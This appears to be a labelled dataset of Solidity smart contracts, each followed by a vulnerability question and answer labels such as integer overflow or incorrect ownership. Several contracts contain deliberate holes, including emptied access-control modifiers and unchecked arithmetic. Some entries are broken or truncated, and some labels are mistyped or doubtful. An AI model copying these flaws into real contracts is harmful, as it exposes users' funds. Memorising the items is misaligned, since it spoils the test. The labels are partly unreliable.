283       pylonSelled += tokens; // Total tokens selled

284       beneficiary.transfer(weiAmount); //Transfer ethers to beneficiary

285       frozenAccount[investor] = true;
286       FrozenFunds(investor, true);

287       TokenPurchase(msg.sender, investor, weiAmount, tokens);

288     }

289     modifier afterDeadline() { if (now >= deadline) _; }

290     /**
291      * Check if goal was reached
292      *
293      * Checks if the goal or time limit has been reached and ends the campaign
294      */
295     function checkGoalReached() afterDeadline onlyOwner {
296         if (amountRaised >= fundingGoal){
297             fundingGoalReached = true;
298             GoalReached(beneficiary, amountRaised);
299         }
300         crowdsaleClosed = true;
301     }


302     // @return true if the transaction can buy tokens
303     function validPurchase() internal constant returns (bool) {
304         uint256 current = getBlockNumber();
305         bool withinPeriod = current >= startBlock && current <= deadline;
306         bool nonZeroPurchase = msg.value != 0;
307         return withinPeriod && nonZeroPurchase;
308     }

309     //////////
310     // Testing specific methods
311     //////////

312     /// @notice This function is overridden by the test Mocks.
313     function getBlockNumber() internal constant returns (uint256) {
314         return block.number;
315     }

316     /// @notice Pauses the contribution if there is any issue
317     function pauseContribution() onlyOwner {
318         paused = true;
319     }

320     /// @notice Resumes the contribution
321     function resumeContribution() onlyOwner {
322         paused = false;
323     }
324 }
325 /**
326  * @title SafeMath
327  * @dev Math operations with safety checks that throw on error
328  */
329 library SafeMath {
330   function mul(uint256 a, uint256 b) internal constant returns (uint256) {
331     uint256 c = a * b;
332     assert(a == 0 || c / a == b);
333     return c;
334   }

335   function div(uint256 a, uint256 b) internal constant returns (uint256) {
336     // assert(b > 0); // Solidity automatically throws when dividing by 0
337     uint256 c = a / b;
338     // assert(a == b * c + a % b); // There is no case in which this doesn't hold
339     return c;
340   }

341   function sub(uint256 a, uint256 b) internal constant returns (uint256) {
342     assert(b <= a);
343     return a - b;
344   }

345   function add(uint256 a, uint256 b) internal constant returns (uint256) {
346     uint256 c = a + b;
347     assert(c >= a);
348     return c;
349   }
350 }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
integer overflow/underflow 
arithmetic flaw 

<end of text>

1 pragma solidity ^0.4.2;
2 contract owned {
3     address public owner;

4     function owned() {
5         owner = msg.sender;
6     }

7     modifier onlyOwner {

8         if (msg.sender != owner) throw;
9         _;
10     }

11     function transferOwnership(address newOwner) onlyOwner {
12         owner = newOwner;
13     }
14 }

15 contract tokenRecipient { function receiveApproval(address _from, uint256 _value, address _token, bytes _extraData); }

16 contract token {
17     /* Public variables of the token */
18     string public standard = 'Token 0.1';
19     string public name;
20     string public symbol;
21     uint8 public decimals;
22     uint256 public totalSupply;

23     /* This creates an array with all balances */
24     mapping (address => uint256) public balanceOf;
25     mapping (address => mapping (address => uint256)) public allowance;

26     /* This generates a public event on the blockchain that will notify clients */
27     event Transfer(address indexed from, address indexed to, uint256 value);

28     /* Initializes contract with initial supply tokens to the creator of the contract */
29     function token(
30         uint256 initialSupply,
31         string tokenName,
32         uint8 decimalUnits,
33         string tokenSymbol
34         ) {
35         balanceOf[msg.sender] = initialSupply;              // Give the creator all initial tokens
36         totalSupply = initialSupply;                        // Update total supply
37         name = tokenName;                                   // Set the name for display purposes
38         symbol = tokenSymbol;                               // Set the symbol for display purposes
39         decimals = decimalUnits;                            // Amount of decimals for display purposes
40     }

41     function transfer(address _to, uint256 _value) {
42         if (balanceOf[msg.sender] < _value) throw;           // Check if the sender has enough
43         if (balanceOf[_to] + _value < balanceOf[_to]) throw; // Check for overflows
44         balanceOf[msg.sender] -= _value;                     // Subtract from the sender
45         balanceOf[_to] += _value;                            // Add the same to the recipient
46         Transfer(msg.sender, _to, _value);                   // Notify anyone listening that this transfer took place
47     }

48     /* Allow another contract to spend some tokens in your behalf */
49     function approve(address _spender, uint256 _value)
50         returns (bool success) {
51         allowance[msg.sender][_spender] = _value;
52         return true;
53     }


54     function approveAndCall(address _spender, uint256 _value, bytes _extraData)
55         returns (bool success) {    
56         tokenRecipient spender = tokenRecipient(_spender);
57         if (approve(_spender, _value)) {
58             spender.receiveApproval(msg.sender, _value, this, _extraData);
59             return true;
60         }
61     }

62     /* A contract attempts to get the coins */
63     function transferFrom(address _from, address _to, uint256 _value) returns (bool success) {
64         if (balanceOf[_from] < _value) throw;                 // Check if the sender has enough
65         if (balanceOf[_to] + _value < balanceOf[_to]) throw;  // Check for overflows
66         if (_value > allowance[_from][msg.sender]) throw;   // Check allowance
67         balanceOf[_from] -= _value;                          // Subtract from the sender
68         balanceOf[_to] += _value;                            // Add the same to the recipient
69         allowance[_from][msg.sender] -= _value;
70         Transfer(_from, _to, _value);
71         return true;
72     }

73     /* This unnamed function is called whenever someone tries to send ether to it */
74     function () {
75         throw;     // Prevents accidental sending of ether
76     }
77 }

78 contract SwftCoin is owned, token {

79     uint256 public sellPrice;
80     uint256 public buyPrice;

81     mapping (address => bool) public frozenAccount;


82     event FrozenFunds(address target, bool frozen);

83     /* Initializes contract with initial supply tokens to the creator of the contract */
84     function SwftCoin(
85         uint256 initialSupply,
86         string tokenName,
87         uint8 decimalUnits,
88         string tokenSymbol
89     ) token (initialSupply, tokenName, decimalUnits, tokenSymbol) {}

90     /* Send coins */
91     function transfer(address _to, uint256 _value) {
92         if (balanceOf[msg.sender] < _value) throw;           // Check if the sender has enough
93         if (balanceOf[_to] + _value < balanceOf[_to]) throw; // Check for overflows
94         if (frozenAccount[msg.sender]) throw;                // Check if frozen
95         balanceOf[msg.sender] -= _value;                     // Subtract from the sender
96         balanceOf[_to] += _value;                            // Add the same to the recipient
97         Transfer(msg.sender, _to, _value);                   // Notify anyone listening that this transfer took place
98     }

99     function transferFrom(address _from, address _to, uint256 _value) returns (bool success) {
100         if (frozenAccount[_from]) throw;                        // Check if frozen            
101         if (balanceOf[_from] < _value) throw;                 // Check if the sender has enough
102         if (balanceOf[_to] + _value < balanceOf[_to]) throw;  // Check for overflows
103         if (_value > allowance[_from][msg.sender]) throw;   // Check allowance
104         balanceOf[_from] -= _value;                          // Subtract from the sender
105         balanceOf[_to] += _value;                            // Add the same to the recipient
106         allowance[_from][msg.sender] -= _value;
107         Transfer(_from, _to, _value);
108         return true;
109     }

110     function mintToken(address target, uint256 mintedAmount) onlyOwner {
111         balanceOf[target] += mintedAmount;
112         totalSupply += mintedAmount;
113         Transfer(0, this, mintedAmount);
114         Transfer(this, target, mintedAmount);
115     }

116     function freezeAccount(address target, bool freeze) onlyOwner {
117         frozenAccount[target] = freeze;
118         FrozenFunds(target, freeze);
119     }

120     function setPrices(uint256 newSellPrice, uint256 newBuyPrice) onlyOwner {
121         sellPrice = newSellPrice;
122         buyPrice = newBuyPrice;
123     }

124     function buy() payable {
125         uint amount = msg.value / buyPrice;                // calculates the amount
126         if (balanceOf[this] < amount) throw;               // checks if it has enough to sell
127         balanceOf[msg.sender] += amount;                   // adds the amount to buyer's balance
128         balanceOf[this] -= amount;                         // subtracts amount from seller's balance
129         Transfer(this, msg.sender, amount);                // execute an event reflecting the change
130     }

131     function sell(uint256 amount) {
132         if (balanceOf[msg.sender] < amount ) throw;        // checks if the sender has enough to sell
133         balanceOf[this] += amount;                         // adds the amount to owner's balance
134         balanceOf[msg.sender] -= amount;                   // subtracts the amount from seller's balance
135         if (!msg.sender.send(amount * sellPrice)) {        // sends ether to the seller. It's important
136             throw;                                         // to do this last to avoid recursion attacks
137         } else {
138             Transfer(msg.sender, this, amount);            // executes an event reflecting on the change
139         }               
140     }
141 }
What are the vulnerabilities in the contract?
integer overflow/underflow
incorrect visibility/ownership
<end of text>
1 pragma solidity ^0.4.11;

2 contract Token {
3     uint256 public totalSupply;
4     function balanceOf(address _owner) constant returns (uint256 balance);
5     function transfer(address _to, uint256 _value) returns (bool success);
6     function transferFrom(address _from, address _to, uint256 _value) returns (bool success);
7     function approve(address _spender, uint256 _value) returns (bool success);
8     function allowance(address _owner, address _spender) constant returns (uint256 remaining);
9     event Transfer(address indexed _from, address indexed _to, uint256 _value);
10     event Approval(address indexed _owner, address indexed _spender, uint256 _value);
11 }

12 contract StandardToken is Token {
13 	bool public disabled = false;
14     function transfer(address _to, uint256 _value) returns (bool success) {
15         if (disabled != true && balances[msg.sender] >= _value && _value > 0) {
16             balances[msg.sender] -= _value;
17             balances[_to] += _value;
18             Transfer(msg.sender, _to, _value);
19             return true;
20         } else { return false; }
21     }
22     function transferFrom(address _from, address _to, uint256 _value) returns (bool success) {
23         if (disabled != true && balances[_from] >= _value && allowed[_from][msg.sender] >= _value && _value > 0) {
24             balances[_to] += _value;
25             balances[_from] -= _value;
26             allowed[_from][msg.sender] -= _value;
27             Transfer(_from, _to, _value);
28             return true;
29         } else { return false; }
30     }
31     function balanceOf(address _owner) constant returns (uint256 balance) {
32         return balances[_owner];
33     }
34     function approve(address _spender, uint256 _value) returns (bool success) {
35         allowed[msg.sender][_spender] = _value;
36         Approval(msg.sender, _spender, _value);
37         return true;
38     }
39     function allowance(address _owner, address _spender) constant returns (uint256 remaining) {
40       return allowed[_owner][_spender];
41     }
42     mapping (address => uint256) balances;
43     mapping (address => mapping (address => uint256)) allowed;
44 }

45 contract NexxusToken is StandardToken {

46     function () {return;}

47     string public name = "Nexxus";
48     uint8 public decimals = 8;
49     string public symbol = "NXX";
50     address public owner;

51     function NexxusToken() {
52         totalSupply = 31800000000000000;
53         owner = msg.sender;
54         balances[owner] = totalSupply;
55     }
56     function approveAndCall(address _spender, uint256 _value, bytes _extraData) returns (bool success) {
57         allowed[msg.sender][_spender] = _value;
58         Approval(msg.sender, _spender, _value);
59         if(!_spender.call(bytes4(bytes32(sha3("receiveApproval(address,uint256,address,bytes)"))), msg.sender, _value, this, _extraData)) { return; }
60         return true;
61     }
62 	function mintToken(uint256 _amount) {
63         if (msg.sender == owner) {
64     		totalSupply += _amount;
65             balances[owner] += _amount;
66     		Transfer(0, owner, _amount);
67         }
68 	}
69 	function disableToken(bool _disable) { 
70         if (msg.sender == owner)
71 			disabled = _disable;
72     }
73 }
What are the vulnerabilities in the contract?
incorrect invisibility/ownership
atomicity violation
integer overflow/underflow
<end of text>
1 pragma solidity ^0.4.24;


2 contract SafeMath {

3     function safeAdd(uint a, uint b) public pure returns (uint c) {
4         c = a + b;

5     }

6     function safeSub(uint a, uint b) public pure returns (uint c) {      
7         c = a - b;
8     }

9     function safeMul(uint a, uint b) public pure returns (uint c) {
10         c = a * b;      
11     }

12     function safeDiv(uint a, uint b) public pure returns (uint c) {      
13         c = a / b;
14     }
15 }

16 contract ERC20Interface {
17     function totalSupply() public constant returns (uint);
18     function balanceOf(address tokenOwner) public constant returns (uint balance);
19     function allowance(address tokenOwner, address spender) public constant returns (uint remaining);
20     function transfer(address to, uint tokens) public returns (bool success);
21     function approve(address spender, uint tokens) public returns (bool success);
22     function transferFrom(address from, address to, uint tokens) public returns (bool success);

23     event Transfer(address indexed from, address indexed to, uint tokens);
24     event Approval(address indexed tokenOwner, address indexed spender, uint tokens);
25 }



26 contract ApproveAndCallFallBack {
27     function receiveApproval(address from, uint256 tokens, address token, bytes data) public;
28 }


29 contract IAMToken is ERC20Interface, SafeMath {
30     string public symbol;
31     string public  name;
32     uint8 public decimals;
33     uint public _totalSupply;

34     mapping(address => uint) balances;
35     mapping(address => mapping(address => uint)) allowed;


36     constructor() public {
37         symbol = "IAM";
38         name = "IAMEMILIANO";
39         decimals = 2;
40         _totalSupply = 100000000000;
41         balances[0x4a460B1Be30c04EB904868fA5292ba8f6Ae2B740] = _totalSupply;
42         emit Transfer(address(0), 0x4a460B1Be30c04EB904868fA5292ba8f6Ae2B740, _totalSupply);
43     }



44     function totalSupply() public constant returns (uint) {
45         return _totalSupply  - balances[address(0)];
46     }



47     function balanceOf(address tokenOwner) public constant returns (uint balance) {
48         return balances[tokenOwner];
49     }


50     function transfer(address to, uint tokens) public returns (bool success) {
51         balances[msg.sender] = safeSub(balances[msg.sender], tokens);
52         balances[to] = safeAdd(balances[to], tokens);
53         emit Transfer(msg.sender, to, tokens);
54         return true;
55     }



56     function approve(address spender, uint tokens) public returns (bool success) {
57         allowed[msg.sender][spender] = tokens;
58         emit Approval(msg.sender, spender, tokens);
59         return true;
60     }



61     function transferFrom(address from, address to, uint tokens) public returns (bool success) {
62         balances[from] = safeSub(balances[from], tokens);
63         allowed[from][msg.sender] = safeSub(allowed[from][msg.sender], tokens);
64         balances[to] = safeAdd(balances[to], tokens);
65         emit Transfer(from, to, tokens);
66         return true;
67     }



68     function allowance(address tokenOwner, address spender) public constant returns (uint remaining) {
69         return allowed[tokenOwner][spender];
70     }


71     function approveAndCall(address spender, uint tokens, bytes data) public returns (bool success) {
72         allowed[msg.sender][spender] = tokens;
73         emit Approval(msg.sender, spender, tokens);
74         ApproveAndCallFallBack(spender).receiveApproval(msg.sender, tokens, this, data);
75         return true;
76     }
What are the vulnerabilities in the contract?
arithmetic flaw
integer overflow/underflow
<end of text>
1 pragma solidity ^0.5.0;


2 contract ERC20Interface {
3     function totalSupply() public view returns (uint);
4     function balanceOf(address tokenOwner) public view returns (uint balance);
5     function allowance(address tokenOwner, address spender) public view returns (uint remaining);
6     function transfer(address to, uint tokens) public returns (bool success);
7     function approve(address spender, uint tokens) public returns (bool success);
8     function transferFrom(address from, address to, uint tokens) public returns (bool success);

9     event Transfer(address indexed from, address indexed to, uint tokens);
10     event Approval(address indexed tokenOwner, address indexed spender, uint tokens);
11 }



12 contract SafeMath {
13     function safeAdd(uint a, uint b) public pure returns (uint c) {
14         c = a + b;
15         require(c >= a);
16     }
 
17 function safeSub(uint a, uint b) public pure returns (uint c) {
18         require(b <= a); 
19         c = a - b; } 

20 function safeMul(uint a, uint b) public pure returns (uint c) { 
21         c = a * b; 
22  } 

23 function safeDiv(uint a, uint b) public pure returns (uint c) { require(b > 0);
24         c = a / b;
25     }
26 }


27 contract AlloHash is ERC20Interface, SafeMath {
28     string public name;
29     string public symbol;
30     uint8 public decimals; // 18 decimals is the strongly suggested default, avoid changing it

31     uint256 public _totalSupply;

32     mapping(address => uint) balances;
33     mapping(address => mapping(address => uint)) allowed;

  
34     constructor() public {
35         name = "AlloHash";
36         symbol = "ALH";
37         decimals = 18;
38         _totalSupply = 180000000000000000000000000;

39         balances[msg.sender] = _totalSupply;
40         emit Transfer(address(0), msg.sender, _totalSupply);
41     }

42     function totalSupply() public view returns (uint) {
43         return _totalSupply  - balances[address(0)];
44     }

45     function balanceOf(address tokenOwner) public view returns (uint balance) {
46         return balances[tokenOwner];
47     }

48     function allowance(address tokenOwner, address spender) public view returns (uint remaining) {
49         return allowed[tokenOwner][spender];
50     }

51     function approve(address spender, uint tokens) public returns (bool success) {
52         allowed[msg.sender][spender] = tokens;
53         emit Approval(msg.sender, spender, tokens);
54         return true;
55     }

56     function transfer(address to, uint tokens) public returns (bool success) {
57         balances[msg.sender] = safeSub(balances[msg.sender], tokens);
58         balances[to] = safeAdd(balances[to], tokens);
59         emit Transfer(msg.sender, to, tokens);
60         return true;
61     }

62     function transferFrom(address from, address to, uint tokens) public returns (bool success) {
63         balances[from] = safeSub(balances[from], tokens);
64         allowed[from][msg.sender] = safeSub(allowed[from][msg.sender], tokens);
65         balances[to] = safeAdd(balances[to], tokens);
66         emit Transfer(from, to, tokens);
67         return true;
68     }
69 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity ^0.4.4;

2 contract Token {

3     function totalSupply() constant returns (uint256 supply) {}
4     function balanceOf(address _owner) constant returns (uint256 balance) {}

5     function transfer(address _to, uint256 _value) returns (bool success) {}

6     function transferFrom(address _from, address _to, uint256 _value) returns (bool success) {}

  
7     function approve(address _spender, uint256 _value) returns (bool success) {}


8     function allowance(address _owner, address _spender) constant returns (uint256 remaining) {}

9     event Transfer(address indexed _from, address indexed _to, uint256 _value);
10     event Approval(address indexed _owner, address indexed _spender, uint256 _value);
11 }



12 contract StandardToken is Token {

13     function transfer(address _to, uint256 _value) returns (bool success) {
   
14         if (balances[msg.sender] >= _value && _value > 0) {
15             balances[msg.sender] -= _value;
16             balances[_to] += _value;
17             Transfer(msg.sender, _to, _value);
18             return true;
19         } else { return false; }
20     }

21     function transferFrom(address _from, address _to, uint256 _value) returns (bool success) {
   
22         if (balances[_from] >= _value && allowed[_from][msg.sender] >= _value && _value > 0) {
23             balances[_to] += _value;
24             balances[_from] -= _value;
25             allowed[_from][msg.sender] -= _value;
26             Transfer(_from, _to, _value);
27             return true;
28         } else { return false; }
29     }

30     function balanceOf(address _owner) constant returns (uint256 balance) {
31         return balances[_owner];
32     }

33     function approve(address _spender, uint256 _value) returns (bool success) {
34         allowed[msg.sender][_spender] = _value;
35         Approval(msg.sender, _spender, _value);
36         return true;
37     }

38     function allowance(address _owner, address _spender) constant returns (uint256 remaining) {
39         return allowed[_owner][_spender];
40     }

41     mapping (address => uint256) balances;
42     mapping (address => mapping (address => uint256)) allowed;
43     uint256 public totalSupply;
44 }

45 contract ERC20Token is StandardToken {

46     function () {
47         //if ether is sent to this address, send it back.
48         throw;
49     }

   

50     function ERC20Token(
51         ) {
52         balances[msg.sender] = 85000000000000;               // Give the creator all initial tokens (100000 for example)
53         totalSupply = 85000000000000;                        // Update total supply (100000 for example)
54         name = "GAIN CHAIN";                                   // Set the name for display purposes
55         decimals = 8;                            // Amount of decimals
56         symbol = "GAIN";                               // Set the symbol for display purposes
57     }


58     function approveAndCall(address _spender, uint256 _value, bytes _extraData) returns (bool success) {
59         allowed[msg.sender][_spender] = _value;
60         Approval(msg.sender, _spender, _value);

61         //call the receiveApproval function on the contract you want to be notified. This crafts the function signature manually so one doesn't have to include a contract in here just for this.
62         //receiveApproval(address _from, uint256 _value, address _tokenContract, bytes _extraData)
63         //it is assumed that when does this that the call *should* succeed, otherwise one would use vanilla approve instead.
64         if(!_spender.call(bytes4(bytes32(sha3("receiveApproval(address,uint256,address,bytes)"))), msg.sender, _value, this, _extraData)) { throw; }
65         return true;
66     }
What are the vulnerabilities in the contract?
integer overflow/underflow
arithmetic flaw
<end of text>
1 pragma solidity ^0.4.24;


2 contract ERC20Basic {
3     function totalSupply() public view returns (uint256);
4     function balanceOf(address who) public view returns (uint256);
5     function transfer(address to, uint256 value) public returns (bool);
6     event Transfer(address indexed from, address indexed to, uint256 value);
7 }

8 contract ERC20 is ERC20Basic {
9     function allowance(address owner, address spender) public view returns (uint256);
10     function transferFrom(address from, address to, uint256 value) public returns (bool);
11     function approve(address spender, uint256 value) public returns (bool); 
12     event Approval(address indexed owner, address indexed spender, uint256 value);
13 }

14 contract BasicToken is ERC20Basic {
15     using SafeMath for uint256;

16     mapping(address => uint256) balances;

17     uint256 totalSupply_;

18     function totalSupply() public view returns (uint256) {
19         return totalSupply_;
20     }

21     function transfer(address _to, uint256 _value) public returns (bool) {

22         balances[msg.sender] = balances[msg.sender].sub(_value);
23         balances[_to] = balances[_to].add(_value);
    
24         emit Transfer(msg.sender, _to, _value);
25         return true;
26     }

27     function balanceOf(address _owner) public view returns (uint256) {
28         return balances[_owner];
29     }
30 }

31 contract Ownable {

32     address public owner;
33     address public operator;

34     event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
35     event OperatorTransferred(address indexed previousOperator, address indexed newOperator);

36     constructor() public {
37         owner    = msg.sender;
38         operator = msg.sender;
39     }

40     modifier onlyOwner() { 
41          _; }
42     modifier onlyOwnerOrOperator() {      
43            _; }

44     function transferOwnership(address _newOwner) external onlyOwner {      
45         emit OwnershipTransferred(owner, _newOwner);
46         owner = _newOwner;
47     }
  
48     function transferOperator(address _newOperator) external onlyOwner { 
49         emit OperatorTransferred(operator, _newOperator);
50         operator = _newOperator;
51     }
52 }

53 contract BlackList is Ownable {

54     event Lock(address indexed LockedAddress);
55     event Unlock(address indexed UnLockedAddress);

56     mapping( address => bool ) public blackList;

57     modifier CheckBlackList {    
58         _; }

59     function SetLockAddress(address _lockAddress) external onlyOwnerOrOperator returns (bool) { 
        
60         blackList[_lockAddress] = true;
        
61         emit Lock(_lockAddress);

62         return true;
63     }

64     function UnLockAddress(address _unlockAddress) external onlyOwner returns (bool) {      
        
65         blackList[_unlockAddress] = false;
        
66         emit Unlock(_unlockAddress);

67         return true;
68     }
69 }

70 contract Pausable is Ownable {
71     event Pause();
72     event Unpause();

73     bool public paused = false;

74     modifier whenNotPaused() { require(!paused); _; }
75     modifier whenPaused() { require(paused); _; }

76     function pause() onlyOwnerOrOperator whenNotPaused public {
77         paused = true;
78         emit Pause();
79     }

80     function unpause() onlyOwner whenPaused public {
81         paused = false;
82         emit Unpause();
83     }
84 }

85 contract StandardToken is ERC20, BasicToken {
  
86     mapping (address => mapping (address => uint256)) internal allowed;

87     function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
        
88         balances[_from] = balances[_from].sub(_value);
89         balances[_to] = balances[_to].add(_value);
90         allowed[_from][msg.sender] = allowed[_from][msg.sender].sub(_value);
    
91         emit Transfer(_from, _to, _value);
92         emit Approval(_from, msg.sender, allowed[_from][msg.sender]);
    
93         return true;
94     }

95     function approve(address _spender, uint256 _value) public returns (bool) {
96         allowed[msg.sender][_spender] = _value;
    
97         emit Approval(msg.sender, _spender, _value);
    
98         return true;
99     }

100     function allowance(address _owner, address _spender) public view returns (uint256) {
101         return allowed[_owner][_spender];
102     }

103     function increaseApproval(address _spender, uint256 _addedValue) public returns (bool) {
104         allowed[msg.sender][_spender] = (allowed[msg.sender][_spender].add(_addedValue));
    
105         emit Approval(msg.sender, _spender, allowed[msg.sender][_spender]);
    
106         return true;
107     }

108     function decreaseApproval(address _spender, uint256 _subtractedValue) public returns (bool) {
109         uint256 oldValue = allowed[msg.sender][_spender];
    
110         if (_subtractedValue > oldValue) {
111             allowed[msg.sender][_spender] = 0;
112         } else {
113             allowed[msg.sender][_spender] = oldValue.sub(_subtractedValue);
114         }
    
115         emit Approval(msg.sender, _spender, allowed[msg.sender][_spender]);
116         return true;
117     }
118 }

119 contract MultiTransferToken is StandardToken, Ownable {

120     function MultiTransfer(address[] _to, uint256[] _amount) onlyOwner public returns (bool) {
        
121         uint256 ui;
122         uint256 amountSum = 0;
    
123         for (ui = 0; ui < _to.length; ui++) {          

124             amountSum = amountSum.add(_amount[ui]);
125         }       

126         for (ui = 0; ui < _to.length; ui++) {
127             balances[msg.sender] = balances[msg.sender].sub(_amount[ui]);
128             balances[_to[ui]] = balances[_to[ui]].add(_amount[ui]);
        
129             emit Transfer(msg.sender, _to[ui], _amount[ui]);
130         }
    
131         return true;
132     }
133 }

134 contract BurnableToken is StandardToken, Ownable {

135     event BurnAdminAmount(address indexed burner, uint256 value);

136     function burnAdminAmount(uint256 _value) onlyOwner public {      

137         balances[msg.sender] = balances[msg.sender].sub(_value);
138         totalSupply_ = totalSupply_.sub(_value);
    
139         emit BurnAdminAmount(msg.sender, _value);
140         emit Transfer(msg.sender, address(0), _value);
141     }
142 }

143 contract MintableToken is StandardToken, Ownable {
144     event Mint(address indexed to, uint256 amount);
145     event MintFinished();

146     bool public mintingFinished = false;

147     modifier canMint() { require(!mintingFinished); _; }

148     function mint(address _to, uint256 _amount) onlyOwner canMint public returns (bool) {
149         totalSupply_ = totalSupply_.add(_amount);
150         balances[_to] = balances[_to].add(_amount);
    
151         emit Mint(_to, _amount);
152         emit Transfer(address(0), _to, _amount);
    
153         return true;
154     }

155     function finishMinting() onlyOwner canMint public returns (bool) {
156         mintingFinished = true;
157         emit MintFinished();
158         return true;
159     }
160 }

161 contract PausableToken is StandardToken, Pausable, BlackList {

162     function transfer(address _to, uint256 _value) public whenNotPaused CheckBlackList returns (bool) {
163         return super.transfer(_to, _value);
164     }

165     function transferFrom(address _from, address _to, uint256 _value) public whenNotPaused CheckBlackList returns (bool) {      

166         return super.transferFrom(_from, _to, _value);
167     }

168     function approve(address _spender, uint256 _value) public whenNotPaused CheckBlackList returns (bool) {
169         return super.approve(_spender, _value);
170     }

171     function increaseApproval(address _spender, uint _addedValue) public whenNotPaused CheckBlackList returns (bool success) {
172         return super.increaseApproval(_spender, _addedValue);
173     }

174     function decreaseApproval(address _spender, uint _subtractedValue) public whenNotPaused CheckBlackList returns (bool success) {
175         return super.decreaseApproval(_spender, _subtractedValue);
176     }
177 }
What are the vulnerabilities in the contract?
incorrect invisibility/ownership
ariithmetic flaw
<end of text>

What are the vulnerabilities in the contract?

<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.6.8;
3 pragma experimental ABIEncoderV2;

4 import "./openzeppelin/contracts/access/Ownable.sol";
5 import "./umb-network/toolbox/dist/contracts/lib/ValueDecoder.sol";
6 import "./interfaces/IStakingBank.sol";
7 import "./BaseChain.sol";

8 contract Chain is BaseChain {
9   IStakingBank public immutable stakingBank;
10   event LogMint(address indexed minter, uint256 blockId, uint256 staked, uint256 power);
11   event LogVoter(uint256 indexed blockId, address indexed voter, uint256 vote);


12   constructor(
13     address _contractRegistry,
14     uint16 _padding,
15     uint16 _requiredSignatures
16   ) public BaseChain(_contractRegistry, _padding, _requiredSignatures) {
17     stakingBank = stakingBankContract();
18   }



19   function isForeign() override external pure returns (bool) {
20     return false;
21   }

22   function getName() override external pure returns (bytes32) {
23     return "Chain";
24   }

25   function getStatus() external view returns(
26     uint256 blockNumber,
27     uint16 timePadding,
28     uint32 lastDataTimestamp,
29     uint32 lastBlockId,
30     address nextLeader,
31     uint32 nextBlockId,
32     address[] memory validators,
33     uint256[] memory powers,
34     string[] memory locations,
35     uint256 staked,
36     uint16 minSignatures
37   ) {
38     blockNumber = block.number;
39     timePadding = padding;
40     lastBlockId = getLatestBlockId();
41     lastDataTimestamp = squashedRoots[lastBlockId].extractTimestamp();
42     minSignatures = requiredSignatures;

43     staked = stakingBank.totalSupply();
44     uint256 numberOfValidators = stakingBank.getNumberOfValidators();
45     powers = new uint256[](numberOfValidators);
46     validators = new address[](numberOfValidators);
47     locations = new string[](numberOfValidators);

48     for (uint256 i = 0; i < numberOfValidators; i++) {
49       validators[i] = stakingBank.addresses(i);
50       (, locations[i]) = stakingBank.validators(validators[i]);
51       powers[i] = stakingBank.balanceOf(validators[i]);
52     }

53     nextBlockId = getBlockIdAtTimestamp(block.timestamp + 1);

54     nextLeader = numberOfValidators > 0
55       ? validators[getLeaderIndex(numberOfValidators, block.timestamp + 1)]
56       : address(0);
57   }

58   function getNextLeaderAddress() external view returns (address) {
59     return getLeaderAddressAtTime(block.timestamp + 1);
60   }

61   function getLeaderAddress() external view returns (address) {
62     return getLeaderAddressAtTime(block.timestamp);
63   }
 
64   function submit(
65     uint32 _dataTimestamp,
66     bytes32 _root,
67     bytes32[] memory _keys,
68     uint256[] memory _values,
69     uint8[] memory _v,
70     bytes32[] memory _r,
71     bytes32[] memory _s
72   ) public { 
73     uint32 lastBlockId = getLatestBlockId();
74     uint32 dataTimestamp = squashedRoots[lastBlockId].extractTimestamp();
    
75     bytes memory testimony = abi.encodePacked(_dataTimestamp, _root);

76     for (uint256 i = 0; i < _keys.length; i++) {
77       require(uint224(_values[i]) == _values[i], "FCD overflow");
78       fcds[_keys[i]] = FirstClassData(uint224(_values[i]), _dataTimestamp);
79       testimony = abi.encodePacked(testimony, _keys[i], _values[i]);
80     }

81     bytes32 affidavit = keccak256(testimony);
82     uint256 power = 0;

83     uint256 staked = stakingBank.totalSupply();
84     address prevSigner = address(0x0);

85     uint256 i = 0;

86     for (; i < _v.length; i++) {
87       address signer = recoverSigner(affidavit, _v[i], _r[i], _s[i]);
88       uint256 balance = stakingBank.balanceOf(signer);

89       require(prevSigner < signer, "validator included more than once");
90       prevSigner = signer;
91       if (balance == 0) continue;

92       emit LogVoter(lastBlockId + 1, signer, balance);
93       power += balance; // no need for safe math, if we overflow then we will not have enough power
94     }

95     require(i >= requiredSignatures, "not enough signatures");
96     squashedRoots[lastBlockId + 1] = _root.makeSquashedRoot(_dataTimestamp);
97     blocksCount++;

98     emit LogMint(msg.sender, lastBlockId + 1, staked, power);
99   }

100   function getLeaderIndex(uint256 _numberOfValidators, uint256 _timestamp) public view returns (uint256) {
101     uint32 latestBlockId = getLatestBlockId();
102     uint256 validatorIndex = latestBlockId +
103       (_timestamp - squashedRoots[latestBlockId].extractTimestamp()) / (padding + 1);

104     return uint16(validatorIndex % _numberOfValidators);
105   }

106   function getLeaderAddressAtTime(uint256 _timestamp) public view returns (address) {
107     uint256 numberOfValidators = stakingBank.getNumberOfValidators();
108     if (numberOfValidators == 0) {
109       return address(0x0);
110     }
111     uint256 validatorIndex = getLeaderIndex(numberOfValidators, _timestamp);
112     return stakingBank.addresses(validatorIndex);
113   }
114 }

What are the vulnerabilities in the contract?
integer over/underflow
incorrect visibility/ownership
arithmetic flaw
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity >=0.4.24 <0.6.0;

3 contract Lottery {

4         mapping (address => mapping(uint64 => uint))
5         public tickets;
6         uint64 winningId; 
7         bool drawingPhase; 
8         }
9         function reset() external{
10                 delete tickets;
11                 winningId = 0; drawingPhase = false;
12         }
13         function buy(uint64 id, uint amount) external {        
14                receivePayment(msg.sender, amount);
15                tickets[msg.sender][id] += amount;
16         }
17         function enterDrawingPhase() external {
18                 drawingPhase = true;
19         }

20         function draw(uint64 id) external {
21                 require(winningId == 0, "already drawn");              
22                 require(id != 0, "invalid winning number");
23                 winningId = id;
24         }
25         function claimReward() external {
26                 require(winningId != 0, "not drawn");
      
27         }
28         function multiBuy(uint[] ids, uint[] amounts)
29         external {
               
30                 uint totalAmount = 0;
31                 for (int i = 0; i < ids.length; i++) {
32                 tickets[msg.sender][ids[i]] += amounts[i];
33                 totalAmount += amounts[i];
34         }
35              receivePayment(msg.sender, totalAmount);
36         }
37  }
What are the vulnerabilities in the contract?
atomicity violation
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity >=0.4.24 <0.6.0;

3 contract Lottery {

4         mapping (address => mapping(uint64 => uint))
5         public tickets;
